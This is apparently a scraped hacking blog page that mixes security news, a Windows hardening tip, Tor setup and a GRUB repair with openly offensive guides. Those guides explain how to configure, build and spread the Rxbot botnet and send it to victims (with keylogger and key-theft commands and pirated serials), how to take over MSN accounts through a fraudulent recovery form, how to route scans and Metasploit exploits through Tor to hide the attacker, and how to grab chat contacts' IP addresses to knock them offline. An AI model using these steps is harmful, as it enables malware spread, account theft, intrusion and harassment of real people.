Dangerious Linux Kernel Vulnerability For ALL 2.4 & 2.6 Kernels

This is a serious bug, it effects all Kernel versions released since May 2001! That goes all the way back to the early 2.4 versions.
It’s also exploitable according to the report – This issue is easily exploitable for local privilege escalation. In order to exploit this, an attacker would create a mapping at address zero containing code to be executed with privileges of the kernel (which I would assume to be root).
At least it only allows local priveledge escalation, if was a remote root exploit in the kernel..it would be a disaster.
Imagine all the Linux boxes out there connected to the net where the admin doesn’t update or read security resources.

Linux developers have issued a critical update for the open-source OS after researchers uncovered a vulnerability in its kernel that puts most versions built in the past eight years at risk of complete takeover.
The bug involves the way kernel-level routines such as sock_sendpage react when they are left unimplemented. Instead of linking to a corresponding placeholder, (for example, sock_no_accept), the function pointer is left uninitialized. Sock_sendpage doesn’t always validate the pointer before dereferencing it, leaving the OS open to local privilege escalation that can completely compromise the underlying machine.
“Since it leads to the kernel executing code at NULL, the vulnerability is as trivial as it can get to exploit,” security researcher Julien Tinnes writes here. “An attacker can just put code in the first page that will get executed with kernel privileges.”

A patch has been released, so if you have untrusted local users on your system UPDATE YOUR KERNEL NOW!
This is the second time this year there has been a serious exploit in the Linux Kernel, which in a way is good because it means people are looking at it critically.
The more bugs that get exposed, the more secure the Kernel and our operating systems become.

Tinnes and fellow researcher Tavis Ormandy released proof-of-concept code that they said took just a few minutes to adapt from a previous exploit they had. They said all 2.4 and 2.6 version since May 2001 are affected.
Security researchers not involved in the discovery were still studying the advisory at time of writing, but at least one of them said it appeared at first blush to warrant an immediate action.
“This passes my it’s-not-crying-wolf test so far,” said Rodney Thayer, CTO of security research firm Secorix. “If I had some kind of enterprise-class Linux system like a Red Hat Enterprise Linux…I would really go check and see if this looked like it related, and if my vendor was on top of it and did I need to get a kernel patch.”

I wonder if any more major bugs will be disclosed before the end of the year? The less Kernel updates that need to be carried out the better in my books.
Full technical details of the bug can be found here:
Linux NULL pointer dereference due to incorrect proto_ops initializations

Read More

Cracking GSM phone crypto

If you are using a GSM phone (AT&T or T-Mobile in the U.S.), you likely have a few more months before it will be easy for practically anyone to spy on your communications.
Security researcher Karsten Nohl is launching an open-source, distributed computing project designed to crack the encryption used on GSM phones and compile it in to a code book that can be used to decode conversations and any data that gets sent to and from the phone.

Karsten Nohl talks about his distributed computing, open-source AE/1 cracking project at the Hacking at Random conference.

(Credit: Hacking at Random)

he hopes that by doing this it will spur cellular providers in to improving the security of their services and fix a weakness that has been around for 15 years and affects about 3 billion mobile users.
"We're not generating a vulnerability but publicizing a flaw that's already being exploited very widely," he said in a phone interview Monday.
"Clearly we are making the attack more practical and much cheaper, and of course there's a moral query of whether we should do that," he said. "But more importantly, we are informing (people) about a longstanding vulnerability and hopefully preventing more systems from adopting this."
This weakness in the encryption used on the phones, A5/1, has been known about for years. there's at least one commercial tools that permit for decrypting GSM communications that range in price from $100,000 to $250,000 depending on how fast you want the program to work, said Nohl, who previously has publicized weaknesses with wireless clever card chips used in transit systems.
It will take 80 high-performance computers about one months to do a brute force attack on A5/1 and generate a large look-up table that will serve as the code book, said Nohl, who announced the project at the Hacking at Random conference in the Netherlands 10 days ago.
Using the code book, anyone could get the encryption key for any GSM call, SMS message, or other communication encrypted with A5/1 and listen to the call or read the data in the clear. If 160 people donate their computing resources to the project, it should only take one and a half months to complete, he said.
Participants download the program and one months later we share the files created with others, by BitTorrent, for instance, Nohl said. "We have no connection to them," he added.
Once the look-up table is created it would be available for anyone to use.
Distributed computing, which has long been used for research and academic purposes, like SETI@home, and which companies have built businesses around, not only solves the technical hurdle to cracking the A5/1 code, but it could solve the legal ones .
A few years ago a similar GSM cracking project was embarked on but was halted before it was completed after researchers were intimidated, possibly by a cellular provider, Nohl said. By distributing the effort among participants and not having it centralized, the new effort will be less vulnerable to outside interference, he said.
Nohl wasn't certain of the legal ramifications of the project but said it's likely that using such a look-up table is illegal but possession is legal because of the companies that openly advertise their tables for sale.
A T-Mobile spokeswoman said the company had no comment on the matter.
AT&T spokesman Mark Siegel said, "We take strange care to protect the privacy of our customers and use a variety of tools, lots of technical and some human approaches. I can't go in to the details for security reasons." he declined to elaborate or comment further.
Taking precautions
Carriers should upgrade the encryption or move voice services to 3G, which has much stronger encryption, Nohl said.
In the meantime, people can use separate encryption products on the phone, like Cellcrypt, or handsets with their own encryption, Nohl said. Amnesty International and Greenpeace are using phones with stronger encryption, for example, but it only works if both parties to a conversation are using the same technology, he said.
For data encryption there is good Privacy (PGP) for e-mail and virtual private network (VPN) program for connecting to a corporate network, he said.
The encryption problem is serious for people doing online banking, where banks are using text messages as authentication tokens. Banks should instead offer RSA SecurID tokens or send one-time pass phrases through regular mail, Nohl said.
"I reckon, potentially, this could have as much impact as the breaking of WEP (Wired Equivalent Privacy) had a few years ago," said Stan Schatt, security practice director at ABI Research. "That shook up the industry a bit."
As a result of breaking that encryption, enterprises were reluctant to rely on wireless LANs so the Wi-Fi Alliance pushed through an interim standard that strengthened the encryption method, he said.
"Vendors will jump in with interim solutions, like Cellcrypt," Schatt said. "Mobile operators themselves will have to jump in and offer additional levels of encryption as part of a managed service offering for people who want a higher level of encryption."
However, consumers aren't likely to want to pay extra for the boosted encryption strength, he said.
To snoop on someone's phone, a would-be spy would want to be within eyesight of the target, Schatt said. Or, spies could point a recording device in the direction of a building and grab whatever conversations were nearby, he said.
"If you stand outside a building of a competitor you could get conversations between product managers and about sensitive corporation information, like acquisitions," he said. "Corporations put even more sensitive information over their phones, in general, than we do over their e-mail."
 The project web page is here and the the talk with slides is here.
 source:cnet.com

Read More

how to Disable the Remote Registry service in Windows

The "Remote Registry" service enables remote users to alter registry setting on your computer. By default, the "Startup type" setting for the "Remote Registry" service may be set to "Automatic” or "Manual" which is a security risk for a single user (or) laptop computer user.
So, to make sure that only users on your computer can alter the process registry disable this "Remote Registry" service.

Here is how it can be completed:

1. Click Start and pick Control Panel from the Start Menu items.Note:
If you find difficulty in accessing the Control Panel in your computer,
CLICK HERE To Know the Different Ways To Access the Windows Control Panel

2. If your Control Panel is showing items in Classic View, find the icon named Administrative Tools and double click on it.

Alternatively if you are under Category View, click Performance and Maintenance and then Click Administrative Tools

3. Now double-click on Services applet which is used to start, stop and configure windows services on your computer. This open the service window listing all the windows services.
4. From the right pane of the Services Window, find the service named Remote Registry

5. Double-click the "Remote Registry" service which shows the Remote Registry Properties for your Local computer.

Now, press the Stop button first to stop the started service and then pick Disabled from the drop down menu under 'Startup Type' and click Apply->OK.

6.Close the "Services" window and restart your computer for the changes to take effect.

That's it!! you have disabled the "Remote Registry" service on your computer to prevent unauthorized changes to the process registry.

Read More

How To Create And Compile Botnets To Autohack 1000ds of Systems

 i found a nice tut that helps u with the basics of the botnets

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:

Download
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.
I myself have helped write one of the most advanced and secure bot sources out there.
(Off topic)
But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !

Theres the infected computers "bots" the attacker, the server, and the victim.

Quote:

while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial

-----------------------------
Here we go ladies and gentlemen 
Follow the tutorial:
-----------------------------

I. Setting up the C++ compilier: (easy)

1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Mirror 2
Mirror 3 Direct
Pass: itzforblitz
Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install the Service Pack 6 (60.8 mb)

4. After that Download and install:

Windows SDK (1.2 mb)
Mirror 2
Mirror 3
Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Quote:

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)


(it does not matter whats below those lines)
---------------------------------------

III. Configuring your bot: (easy)

1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Mirror 2
Mirror 3

2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Quote:

Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:


5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
-------------------------------------
Command list
Download Command list

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC

mIRC
Mirror 2
Mirror 3
--------------------------------------------------------------------------------------------
How to secure your bots:

Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:

Quote:

@update http://www.mybot.com/download/SMSPRO.exe 82

The http://mybot.com is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

This way no one besides you or another op can set the channel topic
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
------------------------------------------------------------------------
Good IRC Servers:

I would recommend running your botnet on a private server.
If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

Read More

How to Hack msn passwords best and easy way

Its basically a way of getting your email back if has been stolen, but I have come to realise that this to can be used to gain access to someones msn. In other words, who ever sends you a email off a @hotmail, @live or @msn email, you can gain access to they are hotmail, no joke, follow the tutorial below.

Well, I don't know if you guys have found this yet, but I have known about it for a few months now.
Windows Live has a revert link, you go to this link, it will ask you questions such as your full name, etc. All the information you want can be recieved by a email of the victim, seven times the form has been filled in like it says on the tutorial, click send, 12 to 24 hours later you will recieve a email from Windows Live asking to put a new password for the victims email. It must be the easiest way to gain access to someones msn, yet not very someone knows about it, well, if you guys don't know about it, I will be happy to share it with you.

Tutorial:

What you will want?
Revert Link: https://support.live.com/eform.aspx?prod...ct=eformcs

Tutorial:

IP Get1.50 (MSN And plugin):
http://rapidshare.com/files/115918445/IPGet1.50.zip

2. The first box will ask you to fill in the persons full name. Basically use some social engineering to get them to email you. Seven times you recieve the email from them it should have there full name next to the contact you recieved it from for e.g: "Forename Surname".

1. To start off basically go to the revert link. You will see some form where you will want to fill in some information on the person you're going to revert, don't let the size of the form put you off since it takes about 5 mins to fill in.

3. Next it will ask you for the e-mail address for us to send a response explains it is self... put your email address in.

4. Below your email address it should ask for the Primary e-mail address/member ID associated with the account you're inquiring about. This is the email address of the person you want to revert.

5. It will then ask you for a date of birth. This makes you think you have no chance... All you want to do is use some social engineering seven times again to try and get they are year of birth no want for month or date. I personally have come to find that you don't want this, so I always put 1992 and it always seems to work.

6. Next is the country, this is simple to get. Don't forget Hotmail checks there information VIA the IP address last logged on the account, the same way they find this information on anyone. I will explain how to get there IP further in to this tutorial. Basically ask for the country or use the method further on in the tutorial.

7. It will then ask you for the state, Seven times again you can gain this information VIA the IP. This will also be explained later on in the tutorial.

8. Now you will want the ZIP or post code. This makes you think "oh there is no point i cannot get it", well you're wrong, it is simple to get, seven times again... I will explain further on in the tutorial how to get this. YOU ONLY NEED THE BEGINNING OF THE POST CODE!

9. It will ask you for the secret answer to your question. You won't want this fill this in with: "I cannot remember"

10. You now will be asked for the alternate e-mail, put the email you used in step 4.

Now you have this you can now fill the rest of the form out. Seven times you have the IP go to: http://ip-adress.com target on there there will be a link at the bottom. Click on it then a new page should come up with a small box, Put the IP in the box and click on locate IP or web-site. It should now come up with all the information you want.

11. Ok, this is the main part of the tutorial on how to gain most of the information VIA the IP, if you have MSN And, download the MSN And IP Get script and import it. Sign out of msn seven times imported then back in. All you want to do now to gain the IP address of your target is send them a file, wait for them to accept then cancle it or send them a voice clip. You should then receive a small pop up in the bottom corner of your screen showing the IP address and the email address of the person.

Fill in step 6 & 7 with the information shown from this IP.

To get the zip/post code of this zoom in on the map on the http://ip-adress.com and grab the closest street shown on the map to where the ip has been located. Now go onto google and type in the state shown and the street you zoomed in for for eg: London, Waterloo postcode then look it up. London, Waterloo should be SE1, Remember... YOU ONLY NEED THE BEGINNING OF THE POST CODE!

13. It will now ask you for the last date and time you successfully signed in, put "Today".

12. Keep http://ip-adress.com open for this step since you will now want the ISP (Web service provider shown).

Congrats! You have filled in all the information you want. To give you more of a chance of this revert working keep reading and fill in a small bit more information!

14. Scroll down a bit untill you see "Names of contacts in your Hotmail address book". Basically fill in the email address of a few ppl like 2-3 on there contact list (get people to add them if you don't know) and fill it in as shown:
example@domain.com, example@domain.com but obviously put in the information needed for YOUR own revert.

16. It will seven times again ask you for the names of contacts on your Messenger contact list. use the same information shown in step 14.

15. You will then be asked for subjects of any elderly mail that's in your hotmail inbox. If they play habbo basically put "Habbo" in this. Maybe if they have a ebay/paypal account, send a password reset email then put "Ebay" or "Paypal" in this box or maybe more than one.

17. You will now be asked for the messenger nickname (display name) copy the persons msn name you're reverting and paste it in to this box. Scroll down and click submit obviously.

Congratulations! You have now done the tutorial on how to revert someone's msn. wait 24 hours for the reply!
If you followed this tutorial properly you have a 99% chance of it working.

Read More

How To perform Anonymous Port scanning using Nmap and Tor

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Web. It also permits developers / researchers to generate new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that permit organizations and individuals to share information over public networks without compromising their privacy

The Onion Router [TOR] is an excellent work towards defending online privacy. As of with every debate about exploitation frameworks, security tools, vulnerability disclosures such projects have also been victim of criticism, and debates of potential abuse that they may cause and the dangers of teaching individuals a dangerous and potentially illegal craft and a ‘secure’ channel to hide their online presence. But lets face it, the bad guys already know about it (that is the reason they’re bad ‘eh). However although these channels of misuse and abuse do exist and they cannot be ignored, still the merits of it will always outweigh the harm black community may cause.

Regrettably in the country I live in even most of the senior know-how people I meet / see / have a chance to work with, don’t even have a clue of online privacy or security of their information.

Privacy is every individuals right, and is as important as any other basic human need. You will seldom require somebody tracking your IP, spywares tracing your network activity, and the next time you try to experiment with something, you receive a disagreeable small e mail from an ISP admin that you were doing so-and-so. I am by no way TEMPTING you to do something wrong. Its all about your morale and motivation : ) , the small how-to below is a kick starter for getting started with TOR and experimenting with some stuff securely. Interested ? move on, but don’t go about emailing me that this stuff like this is illegal to be posted and ought to be removed.

The problem

A basic issue for the privacy minded is that the recipient of your communication / conversation or even otherwise can see that you sent it by taking a look at the IP headers, or worse trace the whole path. And so can authorized intermediaries like ISPs, govt. organizations etc, and sometimes unauthorized intermediaries as well. A very simple type of network traffic analysis might involve sitting somewhere between sender and recipient on the network (man-in-the-middle), taking a look at headers.

But there's also more powerful kinds of packet analysis. Some attackers spy on multiple parts of the Web and use sophisticated statistical techniques to track the communications patterns of plenty of different organizations and individuals. Encryption does not help against these attackers, since it only hides the content of Web traffic, not the headers (VPN ? duh!!) .

The solution:
A distributed, anonymous, secure network

To reduce the risks of both simple and sophisticated traffic analysis by distributing your web traffic over several places / servers, so no single point can link you to your location helps defending your privacy. Its like taking a zig-zag random, hard to follow path to deceive somebody who is tracing you (what the heroes usually do against the villain in action films : ) ) , then periodically erasing your footprints. In lieu of taking a direct route from source to location, information packets on TOR take a random pathway through several servers that cover your tracks so no observer at any single point can tell where the information came from or where it is going.

TOR incrementally builds a circuit of encrypted connections through servers on the network which is extended one hop at a time, and each server along the way knows only which server gave it information and which server it is giving information to. No individual server ever knows the whole path that a knowledge packet has taken. The client negotiates a separate set of encryption keys for each hop along the circuit to make positive that each hop cannot trace these connections as they pass through.

Two times a circuit has been established any information can be exchanged and because each server sees no over one hop in the circuit, neither an eavesdropper nor a compromised server can use traffic analysis to link the connection's source and location.

Tor only works for TCP streams and can be used by any application with SOCKS support.

to experiment and write this small how-to, I setup a server on the Web that I desired to scan from my home network using Nmap, Nessus, and metasploit from my bacttrack suite installed in a VM. Here are the steps I followed to launch the scan / exploitation method by Tor:

A. Installing TOR: Detailed instructions can be viewed on the net site.

B) Download socat .This gizmo is an excellent multipurpose relay and will permit to setup a local TCP listener that will tunnel my connections by the Tor SOCKS server (listening on 9050).

Unfortunately socat comes only on bsd and *nix systems. To make use of TOR on windows I would recommend using Privoxy, or better installing the whole TorCP bundle.

Let us assume that the IP address of the host I desired to scan was 202.163.97.20

I invoked socat:

[talha@localhost#] ./socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1: 202.163.97.20:80, socksport=9050

The above command causes socat to listen on port 8080, and tunnel all incoming connections to 202.163.97.20 (port 80) by the Tor SOCKS server.

For using on windows you will need to:

1. Install privoxy
2. permit HTTP CONNECT requests by 80 through your firewall
3. Browse to http://config.privoxy.org/show-status

C. I assume Nmap, Nessus and metasploit are already installed and running. If not you can find the detailed instrucations on respective website.

D. Launch an nmap connect or nessus scan against 127.0.0.1 port 8080. Configure Nessus to limit the scan to port 8080 in the “Scan Options” tab.

Here are a quantity of the entries in my Apache log that were a result of the scan:
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /Agents/ HTTP/1.1" 404 205 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /cgi-bin/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /index.php?err=3&email= HTTP/1.1" 404 207 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /scripts/fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /scripts/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /Album/ HTTP/1.1" 404 204 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 209 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /cgi-bin/wiki.pl? HTTP/1.1" 404 213 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
The 212.9.32.5 IP address represents the host that is the last onion router in the random circuit that was setup by the Tor program

Simlarly two times you discover a vuln in a remote technique, setup another instance of socat: Say for simplicity you are exploiting a webserver (port 80).

[talha@localhost#] ./socat TCP4-LISTEN:1234,fork SOCKS4:127.0.0.1: 202.163.97.20:80,

In metasploit when launching the exploit, set the target IP to 127.0.0.1 and remote port to 1234. Its that simple eh.

The above instructions may even be used to exploit program flaws in order to anonymously execute arbitrary commands on vulnerable hosts.

Some pieces of advice:

1. Nmap makes use of something that generates packets by the raw packet interface so the packets connect directly to the target, not by Tor. For example:
Doing a connect() scan (TCP) will work with Tor but using something like -sS connects directly to the target, revealing your true address.

2. Nmap & Nessus will often ping a target so see if it is up before doing a port scan. This is usually completed by raw ICMP packet's, ICMP won't traverse the Tor network (since its not TCP) and will reveal your true address.

In the usage of socat, socks4 does client side DNS. So you resolve a target host name by DNS from your machine not by the Tor network proxies.

Hence it is impossible to leak your source IP because you tell your scanner to make use of 127.0.0.1 as the target IP . Therefore, nmap / nessus has no host name to resolve, and in case you do forget to tell your scanner not to bother with ICMP pings, you will finish up pinging yourself – not the target directly.

Staying anonymous

Tor cannot solve all anonymity issues. It focuses only on defending the transport of information. You will need to make use of protocol-specific support program in case you don't require the sites you visit to see your identifying information. For example, you can use web proxies such as Privoxy and open relays while web browsing to block cookies and withhold information about your browser type ident.

Be clever. Don't provide your name or other revealing information in web forms. Be aware that, like all anonymizing networks that are fast for web browsing, Tor does not provide protection against end-to-end timing assaults: If your attacker can watch the traffic coming out of your computer, and also the traffic arriving at your selected location, they can use statistical analysis to discover that they are part of the same circuit.

The Electronic Privacy Information Centre (EPIC) lists down a comprehensive list which servers as a sampling of best available privacy enhancing tools.

Read More

How To install Tor in backtrack4

So you’ve been checking out BackTrack 4, and you want to get your anonymity on? This is assuming you have either installed BT4 to your hard drive or you’re using the VMWare version. You can do this on a LiveCD too of course, but your changes won’t stay unless you do some fancy lzm voodoo and burn a new copy of your CD.

First, you need to add noreply.org repositories to your sources.list. These are the official tor repositories for debian-based Linux distrobutions. Open up a terminal and type:

Code:

nano /etc/apt/sources.list

At the bottom of this file, add these two lines:

Code:

deb http://mirror.noreply.org/pub/tor intrepid main
deb-src http://mirror.noreply.org/pub/tor intrepid main

Save the file. Now download the gpg key, and check the fingerprint:

Code:

gpg --keyserver subkeys.pgp.net --recv 94C09C7F
gpg --fingerprint 94C09C7F

The fingerprint should look like this:

Code:

pub 1024D/94C09C7F 1999-11-10
Key fingerprint = 5B00 C96D 5D54 AEE1 206B AF84 DE7A AF6E 94C0 9C7F
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid Peter Palfrader
uid [jpeg image of size 7974]
sub 1024D/AFA44BDD 2003-07-09 [expires: 2010-07-18]
sub 2048g/E8F4A328 2003-07-09 [expires: 2010-07-18]

Then add it to your apt-key ring by doing this:

Code:

gpg --export 94C09C7F | sudo apt-key add -

Now update your sources, and install tor and privoxy.

Code:

apt-get update
apt-get install tor privoxy

When this is done you’ll need to change a couple of privoxy settings. In a terminal, edit the privoxy config file:

Code:

nano /etc/privoxy/config

Add this line to the top (including the period at the end):

Code:

forward-socks4a / 127.0.0.1:9050 .

Now we need to disable logs. Find the line “logfile logfile” and add a # at the beginning to comment it out (tou can search a file in nano with ctrl-W). You may want to search file the line “jarfile jarfile” and make sure that’s commented out too, but it already is for me. Now exit nano and restart the privoxy service:

Code:

/etc/init.d/privoxy restart

Now head on over to the Torbutton Firefox addon page , install Torbutton, and restart Firefox.

Now head over to the tor detection page . It should tell you that you’re not using tor. Click the tor button in the bottom right corner of Firefox, accept the sad fact that you might leak time zone data, and then press enter in the address bar to reload the page. Note that you can’t just hit refresh, because you need to make sure firefox is opening a new socket it check.torproject.org. If all is well, you see the bright green notice “Congratulations. You are using Tor.”

Read More

How to find the ip Addresses from skype yahoo and msn Updated

The Program we will be using today is called smart sniff the download links are at the bottom. Smartsniff is a network packet analyze it monitors all the incoming and out going data thats going through your PCI Card or WiFi Card. In most cases if its not P2P Such as a IM there will be 2 IPs the one For The server of the Instant Message Provider and The Other IP will be theirs. Now in cases that you want to pull someones IP Straight from Teamviewer that would be very easy.

 Open Up all the programs you need so i have Xfire Open Putty And Smart Sniff Open and Ready to go

After that log in or if your all ready logged in select your VIC that you want to pull the IP From open up a chat and ill give an example of what you do

Example:
You:Hello
Them:Hey
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
You:f
All you do is Spam but remember you must click the Green Play button on smart sniff before you do that way it grabs the data/packets the picture below will help you under stand more

Once you have there IP Feel free to Hit them offline or pull there Location and fuck with them all you want

I suggest if your using Skype or AIM To go into a call with them because the packets will Increase Rapidly and you will be able to pull there IP Really quick :)

Downloads: Smartsniff Here

Read More

how to fix Partision not found / Grub Error or remove ubuntu

Okay, I know some people are going to have a cow because I'm posting this. But the truth is, there are a lot of people trying Ubuntu along with windows 7. people who have attempted to remove Ubuntu with out deleting all partitions of ubuntu are left with this grub error .my friend recently faced with this and asked my help to fix this this is a common problem faced by many so i am posting a solution on how fix this

So......for all of you who have a dual-boot system and are looking to remove Ubuntu for now, here are some tips. NEVER NEVER NEVER just remove the Ubuntu partitions - you won't be able to boot Windows because the information pointed to by your master boot record will be gone. Instead, follow these easy steps:

(1) Boot you Windows installation
(2) Click on this link Get Mbrfix
(3) Download the program, unzip it and copy it to your root folder (I'll assume c:\)
(4) Open up the command prompt in Windows by going to start/accessories/command prompt
(5) Type:
cd \ and press "Enter"
mbrfix /drive 0 fixmbr /yes and press "Enter"

*PLEASE NOTE* The above assumes your boot device is device 0 - if you are not sure on this please post for help.

(6) Close the command prompt window


*PLEASE NOTE* The following assumes you want to get rid of your Ubuntu partitions and resize you Windows partition(s) to take up that space. If you do not wish to do so, you can stop now.

(7) Put your Ubuntu LiveCD back in the CD drive and reboot your PC so the the Ubuntu desktop comes up
(8) On the Ubuntu desktop, look at the top menu bar and go to applications/accessories/terminal
(9) When the terminal Window comes up type:
sudo gparted and press "Enter"

This brings up the disk manager. You want to:

(a) delete all non-Windows partitions
(b) resize your Windows partition to be larger (optional - you may want to leave this alone so you can
come back and try Ubuntu again! )

(10) When you have finished deleting the Ubuntu partitions, just restart your PC, removing the CD from the
drive before it boots again.

If everything went correctly, your PC should just automatically boot Windows. Note that on the first boot of Windows after you have changed the disk (especially if you resized the Windows partition), Windows may run a chkdsk - this is normal and should be ok.

If you have already deleted you Linux partitions and are getting grub errors, please try this as suggested by this user (thanks for the neat addition!!)

Bothered
A Carafe of Ubuntu
Join Date: Jun 2007
Location: United Kingdom
Beans: 136
Ubuntu 7.04 Feisty Fawn User
Windows User


Re: HowTo: Remove Ubuntu (& Restore Windows)

--------------------------------------------------------------------------------

If you delete the ubuntu partitions without running mbrfix then you can use the ubuntu LiveCD to restore the master boot record by:

1. Booting from the ubuntu LiveCD
2. Enabling universe repositories - launch System->Administation->Software Sources and check the "Community maintained Open Source software (universe)"
3. Installing the "ms-sys" package - click Applications->Accessories->Terminal and type "sudo apt-get update" and then "sudo apt-get install ms-sys".
4. Finally restore the Windows master boot record by entering the command "ms-sys -w /dev/[drive]", where [drive] is the hard disk whose Windows master boot record you want to restore. You can find out which this is by launching gparted (System->Administration->GNOME Partition Editor) and cycling through the available drives until you find your Windows partition

- - - - -

Hope this helps, and please let me know if anyone finds any errors. Also, for anyone using this post, "we" really hope you will come back to Ubuntu someday! Linux, and Ubuntu, will be waiting!

============================

Trouble shooting:

If, after following this guide, you can not boot to Windows you may need to boot a live CD and manually delete the Ubuntu partition (making it unpartitioned space, adding it to the Windows partition, or formatting it to FAT/NTFS). Additionally you need to be sure the MBR is set for Windows. You will need to search the forums for more help on that. In addition, the following Microsoft articles may be of help:

Read More

How To Factory Unlock Your IPhone Rite from your Home

Recently i came across a website where you can Factory unlock any iPhone permanently rite from you home .I Factory unlocked my iphone 5 locked To AT&T in just 6 hours .


Why to unlock your iPhone what difference will it make ?

• After unlocking you can use your iphone with any Gsm carrier in the world . Means you can shift  to any carrier that best suits  your needs .
• Unlike soft ware or hardware unlocks this wont void your warranty .
• Its safe and fast you just need to order the unlock , and restore your iphone from itunes  to get it unlocked as simple as that .
• You can increase the resale value of your iphone .
